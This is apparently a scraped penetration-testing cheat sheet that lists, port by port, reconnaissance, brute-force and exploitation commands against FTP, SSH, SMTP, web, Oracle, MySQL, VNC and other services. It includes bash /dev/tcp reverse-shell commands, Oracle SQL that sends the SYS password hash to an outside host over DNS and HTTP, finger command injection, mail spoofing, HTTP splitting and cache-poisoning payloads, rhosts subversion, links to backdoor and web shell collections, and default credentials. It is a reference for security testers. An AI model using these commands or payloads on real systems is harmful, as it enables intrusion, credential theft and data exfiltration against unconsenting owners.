Penetration¶
Penetration testing methodology¶
http://www.0daysecurity.com/penetration-testing/penetration.html
- Discovery & Probing
- Enumeration
- Network Footprinting
- Password Cracking
- Voip Security
- Vulnerability Assesment
- Wireless Penetration
- General Penetration
Discovery & Probing
- Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS’s respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
- Default Port Lists
- Windows *nix
- Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
- General Enumeration Tools
- nmap
- nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results nmap -A -sS -PN -n –script:all ip_address –reason grep “appears to be up” nmap_saved_filename | awk -F( ‘{print $2}’ | awk -F) ‘{print $1}’ > ip_list
- netcat
- nc -v -n IP_Address port nc -v -w 2 -z IP_Address port_range/port_number
- amap
- amap -bqv 192.168.1.1 80 amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] …]
- xprobe2
- xprobe2 192.168.1.1
- sinfp
- ./sinfp.pl -i -p
- nbtscan
- nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
- hping
- hping ip_address
- scanrand
- scanrand ip_address:all
- unicornscan
- unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:’ ] IP_ADDRESS/ CIDR_NET_MASK: S-E
- netenum
- netenum network/netmask timeout
fping fping -a -d hostname/ (Network/Subnet_Mask)
- Firewall Specific Tools
- firewalk
- firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
- ftester
- host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
- Active Hosts
Open TCP Ports Closed TCP Ports Open UDP Ports Closed UDP Ports Service Probing
SMTP Mail Bouncing Banner Grabbing
Other HTTP
- Commands
- JUNK / HTTP/1.0 HEAD / HTTP/9.3 OPTIONS / HTTP/1.0 HEAD / HTTP/1.0
- Extensions
- WebDAV ASP.NET Frontpage OWA IIS ISAPI PHP OpenSSL
- HTTPS
- Use stunnel to encapsulate traffic.
SMTP POP3 FTP
If banner altered, attempt anon logon and execute: ‘quote help’ and ‘syst’ commands.
- ICMP Responses
- Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Request) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address
- Source Port Scans
- TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos)
- Firewall Assessment
- Firewalk TCP/UDP/ICMP responses
OS Fingerprint
Enumeration
- FTP port 21 open
- Fingerprint server
telnet ip_address 21 (Banner grab) Run command ftp ip_address ftp@example.com Check for anonymous access
ftp ip_addressUsername: anonymous OR anonPassword: any@email.com- Password guessing
- Hydra brute force medusa Brutus
- Examine configuration files
- ftpusers ftp.conf proftpd.conf
- MiTM
- pasvagg.pl
- SSH port 22 open
- Fingerprint server
telnet ip_address 22 (banner grab) scanssh
scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask- Password guessing
ssh root@ip_address guess-who
./b -l username -h ip_address -p 22 -2 < password_file_locationHydra brute force brutessh Ruby SSH Bruteforcer
- Examine configuration files
- ssh_config sshd_config authorized_keys ssh_known_hosts .shosts
- SSH Client programs
- tunnelier winsshd putty winscp
- Telnet port 23 open
- Fingerprint server
- telnet ip_address
- Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
telnetfp
Password Attack
Common passwords Hydra brute force Brutus telnet -l “-froot” hostname (Solaris 10+)
- Examine configuration files
- /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet
- Sendmail Port 25 open
- Fingerprint server
- telnet ip_address 25 (banner grab)
- Mail Server Testing
- Enumerate users
- VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts)
- Mail Spoof Test
- HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
Mail Relay Test
- HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain> Unknown domain - mail from: <user@unknown_domain> Domain not present - mail from: <user@localhost> Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain> Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <”user@recipent-domain”>
User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
- Examine Configuration Files
- sendmail.cf submit.cf
- DNS port 53 open
- Fingerprint server/ service
- host
- host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
- nslookup
- nslookup [ -option … ] [ host-to-find | - [ server ]]
- dig
- dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt… ]
whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
- DNS Enumeration
- Bile Suite
- perl BiLE.pl [website] [project_name] perl BiLE-weigh.pl [website] [input file] perl vet-IPrange.pl [input file] [true domain file] [output file] <range> perl vet-mx.pl [input file] [true domain file] [output file] perl exp-tld.pl [input file] [output file] perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names] perl qtrace.pl [ip_address_file] [output_file] perl jarf-rev [subnetblock] [nameserver]
- txdns
- txdns -rt -t domain_name txdns -x 50 -bb domain_name txdns –verbose -fm wordlist.dic –server ip_address -rr SOA domain_name -h c: hostlist.txt
- Examine Configuration Files
- host.conf resolv.conf named.conf
- TFTP port 69 open
- TFTP Enumeration
- tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i <IP> GET /etc/passwd (old Solaris)
- TFTP Bruteforcing
- TFTP bruteforcer Cisco-Torch
- Finger Port 79 open
- User enumeration
- finger ‘a b c d e f g h’ @example.com finger admin@example.com finger user@example.com finger 0@example.com finger .@example.com finger **@example.com finger test@example.com finger @example.com
- Command execution
- finger “|/bin/id@example.com" finger "|/bin/ls -a /@example.com”
- Finger Bounce
- finger user@host@victim finger @internal@external
- Web Ports 80, 8080 etc. open
- Fingerprint server
Telnet ip_address port Firefox plugins
- All
- firecat
- Specific
- add n edit cookies asnumber header spy live http headers shazou web developer
- Crawl website
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html- Web Directory enumeration
- Nikto
- nikto [-h target] [options]
DirBuster Wikto Goolag Scanner
- Vulnerability Assessment
- Manual Tests
Default Passwords Install Backdoors
- ASP
- http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
- Assorted
- http://michaeldaw.org/projects/web-backdoor-compilation/ http://open-labs.org/hacker_webkit02.tar.gz
- Perl
- http://home.arcor.de/mschierlm/test/pmsh.pl http://pentestmonkey.net/tools/perl-reverse-shell/ http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
- PHP
- http://php.spb.ru/remview/ http://pentestmonkey.net/tools/php-reverse-shell/ http://pentestmonkey.net/tools/php-findsock-shell/
- Python
- http://matahari.sourceforge.net/
- TCL
- http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
- Bash Connect Back Shell
- GnuCitizen
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
- Neohapsis
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
- Method Testing
- nc IP_Adress Port
- HEAD / HTTP/1.0 OPTIONS / HTTP/1.0 PROPFIND / HTTP/1.0 TRACE / HTTP/1.1 PUT http://Target_URL/FILE_NAME POST http://Target_URL/FILE_NAME HTTP/1.x
- Upload Files
- curl
- curl -u <username:password> -T file_to_upload <Target_URL> curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” <Target_URL>
- put.pl
- put.pl -h target -r /remote_file_name -f local_file_name
- webdav
- cadaver
- View Page Source
- Hidden Values Developer Remarks Extraneous Code Passwords!
- Input Validation Checks
- NULL or null
- Possible error messages returned.
- ‘ , ” , ; , <!
- Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
- – , = , + , “
- Used to craft SQL Injection queries.
- ‘ , &, ! , ¦ , < , >
- Used to find command execution vulnerabilities.
- “><script>alert(1)</script>
- Basic Cross-Site Scripting Checks.
- %0d%0a
- Carriage Return (%0d) Line Feed (%0a)
HTTP Splitting
- language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
- i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>- %7f , %ff
- byte-length overflows; maximum 7- and 8-bit values.
- -1, other
- Integer and underflow vulnerabilities.
- %n , %x , %s
- Testing for format string vulnerabilities.
- ../
- Directory Traversal Vulnerabilities.
- % , _, *
- Wildcard characters can sometimes present DoS issues or information disclosure.
- Ax1024+
- Overflow vulnerabilities.
- Automated table and column iteration
- orderby.py
- ./orderby.py www.site.com/index.php?id=
- d3sqlfuzz.py
- ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE–
- Vulnerability Scanners
- Acunetix Grendelscan NStealth Obiwan III w3af
- Specific Applications/ Server Tools
- Domino
- dominoaudit
- dominoaudit.pl [options] -h <IP>
- Joomla
- cms_few
- ./cms.py <site-name>
- joomsq
- ./joomsq.py <IP>
joomlascan
./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don’t show 404 responses]
- joomscan
- ./joomscan.py -u “www.site.com/joomladir/” -o site.txt -p 127.0.0.1:80
- jscan
- jscan.pl -f hostname (shell.txt required)
- aspaudit.pl
- asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
- Vbulletin
- vbscan.py
- vbscan.py <host> <port> -v vbscan.py -update
- ZyXel
zyxel-bf.sh snmpwalk
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
- snmpget
- snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
- Proxy Testing
- Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab
- Examine configuration files
- Generic
- Examine httpd.conf/ windows config files
- JBoss
- JMX Console http://<IP>:8080/jmxconcole/
- War File
- Joomla
- configuration.php diagnostics.php joomla.inc.php config.inc.php
- Mambo
- configuration.php config.inc.php
- Wordpress
- setup-config.php wp-config.php
- ZyXel
/WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups
/RestoreCfg.html /BackupCfg.html Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
ZyXEL Config Reader- Examine web server logs
- c:winntsystem32LogfilesW3SVC1
- awk -F ” ” ‘{print $3,$11} filename | sort | uniq
- References
- White Papers
- Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet
- Books
- Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker’s Handbook
- Exploit Frameworks
- Brute-force Tools
- Acunetix
Metasploit w3af
- Portmapper port 111 open
- rpcdump.py
- rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
- rpcinfo
- rpcinfo [options] IP_Address
- NTP Port 123 open
- NTP Enumeration
ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq
host hostname ntpversion readlist version- Examine configuration files
- ntp.conf
- NetBIOS Ports 135-139,445 open
- NetBIOS enumeration
- Enum
- enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
- Null Session
- net use \192.168.1.1ipc$ “” /u:””
- net view \ip_address Dumpsec
- Smbclient
- smbclient -L //server/share password options
- Superscan
- Enumeration tab.
user2sid/sid2user Winfo
- NetBIOS brute force
- Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)
- Examine Configuration Files
- Smb.conf lmhosts
- SNMP port 161 open
- Default Community Strings
public private cisco
cable-docsis ILMI- MIB enumeration
- Windows NT
- .1.3.6.1.2.1.1.5 Hostnames .1.3.6.1.4.1.77.1.4.2 Domain Name .1.3.6.1.4.1.77.1.2.25 Usernames .1.3.6.1.4.1.77.1.2.3.1.1 Running Services .1.3.6.1.4.1.77.1.2.27 Share Information
Solarwinds MIB walk Getif snmpwalk
snmpwalk -v <Version> -c <Community string> <IP>Snscan Applications
- ZyXel
- snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0 snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
- SNMP Bruteforce
- onesixtyone
- onesixytone -c SNMP.wordlist <IP>
- cat
- ./cat -h <IP> -w SNMP.wordlist
Solarwinds SNMP Brute Force ADMsnmp
- Examine SNMP Configuration files
- snmp.conf snmpd.conf snmp-config.xml
- LDAP Port 389 Open
- ldap enumeration
- ldapminer
- ldapminer -h ip_address -p port (not required if default) -d
- luma
- Gui based tool
- ldp
- Gui based tool
- openldap
- ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs…] ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
- ldap brute force
- bf_ldap
- bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
K0ldS LDAP_Brute.pl
- Examine Configuration Files
- General
- containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf
- IBM SecureWay V3 server
- V3.sas.oc
- Microsoft Active Directory server
- msadClassesAttrs.ldif
- Netscape Directory Server 4
- nsslapd.sas_at.conf nsslapd.sas_oc.conf
- OpenLDAP directory server
- slapd.sas_at.conf slapd.sas_oc.conf
- Sun ONE Directory Server 5.1
- 75sas.ldif
- PPTP/L2TP/VPN port 500/1723 open
- Enumeration
- ike-scan ike-probe
- Brute-Force
- ike-crack
- Reference Material
- PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation
- Modbus port 502 open
- modscan
- rlogin port 513 open
- Rlogin Enumeration
- Find the files
- find / -name .rhosts locate .rhosts
- Examine Files
- cat .rhosts
- Manual Login
- rlogin hostname -l username rlogin <IP>
- Subvert the files
- echo ++ > .rhosts
- Rlogin Brute force
- Hydra
- rsh port 514 open
- Rsh Enumeration
- rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
- Rsh Brute Force
- rsh-grind Hydra medusa
- SQL Server Port 1433 1434 open
- SQL Enumeration
piggy SQLPing
sqlping ip_address/hostnameSQLPing2 SQLPing3 SQLpoke SQL Recon SQLver
- SQL Brute Force
- SQLPAT
- sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
SQL Dict SQLAT Hydra SQLlhf ForceSQL
- Citrix port 1494 open
- Citrix Enumeration
Default Domain Published Applications
./citrix-pa-scan {IP_address/file | - | random} [timeout] citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]- Citrix Brute Force
bforce.js connect.js Citrix Brute-forcer Reference Material
Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way- Oracle Port 1521 Open
- Oracle Enumeration
oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL
SQL> select utl_http.request(’http://gladius:5500/’||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME=’SYS’)) from dual;
WinSID Oracle default password list TNSVer
tnsver host [port]TCP Scan Oracle TNSLSNR
Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
- TNSCmd
- perl tnscmd.pl -h ip_address perl tnscmd.pl version -h ip_address perl tnscmd.pl status -h ip_address perl tnscmd.pl -h ip_address –cmdsize (40 - 200)
LSNrCheck Oracle Security Check (needs credentials) OAT
sh opwg.sh -s ip_address opwg.bat -s ip_address sh oquery.sh -s ip_address -u username -p password -d SID OR c:oquery -s ip_address -u username -p password -d SID
- OScanner
- sh oscanner.sh -s ip_address oscanner.exe -s ip_address sh reportviewer.sh oscanner_saved_file.xml reportviewer.exe oscanner_saved_file.xml
NGS Squirrel for Oracle Service Register
Service-register.exe ip_addressPLSQL Scanner 2008
- Oracle Brute Force
- OAK
- ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid username password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port
- breakable (Targets Application Server Port)
- breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
- SQLInjector (Targets Application Server Port)
- sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
Check Password orabf
orabf [hash]:[username] [options]
- thc-orakel
- Cracker Client Crypto
- DBVisualisor
- Sql scripts from pentest.co.uk Manual sql input of previously reported vulnerabilties
- Oracle Reference Material
Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets
- NFS Port 2049 open
- NFS Enumeration
- showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point
- NFS Brute Force
- Interact with NFS share and try to add/delete Exploit and Confuse Unix
- Examine Configuration Files
- /etc/exports /etc/lib/nfs/xtab
- Compaq/HP Insight Manager Port 2301,2381open
- HP Enumeration
- Authentication Method
Host OS Authentication Default Authentication
Default PasswordsWikto Nstealth
- HP Bruteforce
- Hydra Acunetix
- Examine Configuration Files
- path.properties mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc
- MySQL port 3306 open
- Enumeration
- nmap -A -n -p3306 <IP Address> nmap -A -n -PN –script:ALL -p3306 <IP Address> telnet IP_Address 3306 use test; select * from test; To check for other DB’s – show databases
- Administration
- MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog
- Manual Checks
- Default usernames and passwords
username: root password: testing
mysql -h <Hostname> -u root mysql -h <Hostname> -u root mysql -h <Hostname> -u root@localhost mysql -h <Hostname> mysql -h <Hostname> -u “”@localhost- Configuration Files
- Operating System
- windows
config.ini my.ini
windowsmy.ini winntmy.ini<InstDir>/mysql/data/
- unix
- my.cnf
- /etc/my.cnf /etc/mysql/my.cnf /var/lib/mysql/my.cnf ~/.my.cnf /etc/my.cnf
- Command History
- ~/.mysql.history
- Log Files
- connections.log update.log common.log
To run many sql commands at once – mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf)
Parent dir = data directory mysql test information_schema (Key information in MySQL)
Complete table list – select table_schema,table_name from tables; Exact privileges – select grantee, table_schema, privilege_type FROM schema_privileges; File privileges – select user,file_priv from mysql.user where user=’root’; Version – select version(); Load a specific file – SELECT LOAD_FILE(‘FILENAME’);
- SSL Check
- mysql> show variables like ‘have_openssl’;
- If there’s no rows returned at all it means the the distro itself doesn’t support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn’t started with ssl and can be easily fixed.
- Privilege Escalation
- Current Level of access
- mysql>select user(); mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user=’OUTPUT OF select user()’;
- Access passwords
- mysql> use mysql mysql> select user,password from user;
- Create a new user and grant him privileges
- mysql>create user test identified by ‘test’; mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on . to mysql identified by ‘mysql’ WITH GRANT OPTION;
- Break into a shell
- mysql> ! cat /etc/passwd mysql> ! bash
- SQL injection
- mysql-miner.pl
- mysql-miner.pl http://target/ expected_string database
http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
- References.
- Design Weaknesses
- MySQL running as root Exposed publicly on Internet
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
- RDesktop port 3389 open
- Rdesktop Enumeration
- Remote Desktop Connection
- Rdestop Bruteforce
- TSGrinder
- tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
Tscrack
- Sybase Port 5000+ open
- Sybase Enumeration
- sybase-version ip_address from NGS
- Sybase Vulnerability Assessment
- Use DBVisualiser
- Sybase Security checksheet
- Copy output into excel spreadsheet Evaluate mis-configured parameters
- Manual sql input of previously reported vulnerabilties
- Advanced SQL Injection in SQL Server More Advanced SQL Injection
NGS Squirrel for Sybase
- SIP Port 5060 open
- SIP Enumeration
- netcat
- nc IP_Address Port
- sipflanker
- python sipflanker.py 192.168.1-254
Sipscan smap
smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address- SIP Packet Crafting etc.
- sipsak
- Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
siprogue
- SIP Vulnerability Scanning/ Brute Force
- tftp bruteforcer
- Default dictionary file ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
VoIPaudit SiVuS
- Examine Configuration Files
- SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf <Ethernet address>.cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc.
- VNC port 5900^ open
- VNC Enumeration
- Scans
- 5900^ for direct access.5800 for HTTP access.
- VNC Brute Force
- Password Attacks
- Remote
- Password Guess
- vncrack
- Password Crack
vncrack Packet Capture
Phosshttp://www.phenoelit.de/phoss- Local
- Registry Locations
- HKEY_CURRENT_USERSoftwareORLWinVNC3 HKEY_USERS.DEFAULTSoftwareORLWinVNC3
- Decryption Key
- 0x238210763578887
- Exmine Configuration Files
- .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf
- X11 port 6000^ open
- X11 Enumeration
List open windows Authentication Method
Xauth Xhost- X11 Exploitation
- xwd
- xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
- Keystrokes
- Received Transmitted
Screenshots xhost +
- Examine Configuration Files
/etc/Xn.hosts /usr/lib/X11/xdm
Search through all files for the command “xhost +” or “/usr/bin/X11/xhost +”/usr/lib/X11/xdm/xsession /usr/lib/X11/xdm/xsession-remote /usr/lib/X11/xdm/xsession.0 /usr/lib/X11/xdm/xdm-config
DisplayManager*authorize:on- Tor Port 9001, 9030 open
- Tor Node Checker
- Ip Pages Kewlio.net
nmap NSE script
- Jet Direct 9100 open
- hijetta
Network Footprinting
Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
- Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.
- Authoratitive Bodies
IANA - Internet Assigned Numbers Authority ICANN - Internet Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry
AFRINIC - African Network Information Centre APNIC - Asia Pacific Network Information Centre
- National Internet Registry
- APJII CNNIC JPNIC KRNIC TWNIC VNNIC
ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre
- Websites
- Central Ops
- Domain Dossier Email Dossier
- DNS Stuff
- Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
- Fixed Orbit
- Autonomous System lookups and other online tools available.
Geektools IP2Location
Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
- Kartoo
- Metasearch engine that visually presents its results.
- MyIPNeighbors.com
- Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
- Netcraft
- Online search tool allowing queries for host information.
- Robtex
